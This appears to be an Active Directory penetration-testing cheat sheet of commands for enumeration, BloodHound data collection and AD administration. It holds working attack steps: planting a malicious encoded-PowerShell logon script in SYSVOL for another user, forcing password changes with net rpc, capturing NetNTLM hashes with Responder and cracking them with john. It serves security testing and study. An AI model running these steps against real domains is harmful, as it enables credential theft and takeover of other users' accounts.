icon

Active Directory Pentesting

Last modified: 2024-10-13

Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.

Enumeration

Domain Controllers Discovery

dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25

Enumeration with BloodHound

1. Run BloodHound

We use BloodHound Community Edition.
The following command starts the Docker Compose of the BloodHound.

curl -L https://ghst.ly/getbhce | docker compose -f - up

After that, we can use the web UI by accessing to localhost:8080 in web browser.
Login with the username admin and the password which is displayed the log when executing the above command.

To specify arbitrary ip and port, set the environment variables on our attack machine:

export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090

2. Collect Data with BloodHound.py

Here we use BloodHound.py.
Install it as follow:

python3 -m venv venv
source venv/bin/activate
pip3 install bloodhound
bloodhound-python -h

Then

# -d: Domain
# -u: Username
# -p: Password
# -dc: Domain Controller
# -c all: Collect all data
# -ns: Alternate the nameserver
bloodhound-python -d example.local -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc dc.example.local -c all -ns ns.example.local

# If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>

3. Upload Collected Data

After running, the result files (*.json) generated in the current directory. Upload all these JSON files to the BloodHound in web browser.

We can explore the relationship in the Active Directory.


Investigation

# List all users
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A

# List all groups
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com

# List the password policy
net accounts /domain

# List AD objects
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com

# Retrieve information about the given domain.
Get-ADDomain -Server dc.example.com

# Change the password of AD user
Set-ADAccountPassword -Identity <username> -Server dc.example.com  -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)

# SYSVOL - A shared folder storing the Group Policy Objects (GPOs).
dir \\dc.example.com\SYSVOL\

Abuse Logon Script for Other Users

If the current user has the permission to write scripts in SYSVOL, we may be able to change other users logon script path.

# 1. Check the permission
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\

# 2. Modify/Add a malicious script
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat

# 3. Set logon script for the specified user
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat

When the other user logs on, the .bat script will be executed.


Force Change Password Attack

If we found some username/password, and other usernames, we might be able to change other user passwords. The user needs to have GenericAll permission to change passwords of other users.

# -U: User credential who has the permission to change another user password
# -I: Target IP
# -S: Target server name
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"

Microsoft Management Console (mmc)

To setup AD, follow this instructions:

  1. Right-click on the Windows icon.
  2. Click "Run" and enter "mmc" then click "OK".
  3. In the MMC, click "File → Add or Remove Snap-ins".
  4. Add all three "Active Directory…" snap-ins.
  5. Right-click on the "Active Directory…" in the left pane and select "Change Forest".
  6. Enter the domain as the Root domain and click OK.
  7. Click on "View → Advanced Features".

Naming Convention

If we found usernames list in Active Directory, we can modify usernames with naming convention.
For instance,

john smith   -> jsmith, j.smith
michael pole -> mpole, m.pole

SSH Login with AD Credentials

ssh dc.example.com\\<ad_username>@sub.dc.example.com

Inject Credentials into Memory

# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe

DNS Configuration

# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

Now check if the configuration is set correctly.

nslookup dc.example.com

Basic Knowledge

User Management

  • Delegation

    In Active Directory, the administrator delegate another user to manage users over an Organizational Unit (OU), without the admin privileges.

    1. Setup

      1. Open "Active Directory Users and Computers".
      2. Right-click on the target OU, and click “Deligate Control…”. Then the new window will open.
      3. In the window, input username who you want to delegate the privilege that manage users.
      4. Select tasks to which the delegated user should manage.
      5. Click OK.
    2. Manage Users

      1. Logon as the delegated user.

      2. For instance, if you want to reset the john's password, execute the following command in PowerShell. Then input new password in prompt.

        Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
        
      3. The first time John logs on after that, we want John to change his arbitrary password not the password you entered. So that to, execute the following command.

        Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
        
      4. Now when John logs on he will be prompt to change a new password.


Intercept NetNTLM Authentication

Start Responder to listen for any LLMNR, NBT-NS, WPAD requests.

sudo responder -I <interface-like-eth0>

Leave Responder running until receiving some requests.
If you get NTLM hash, crack it in local machine.

echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt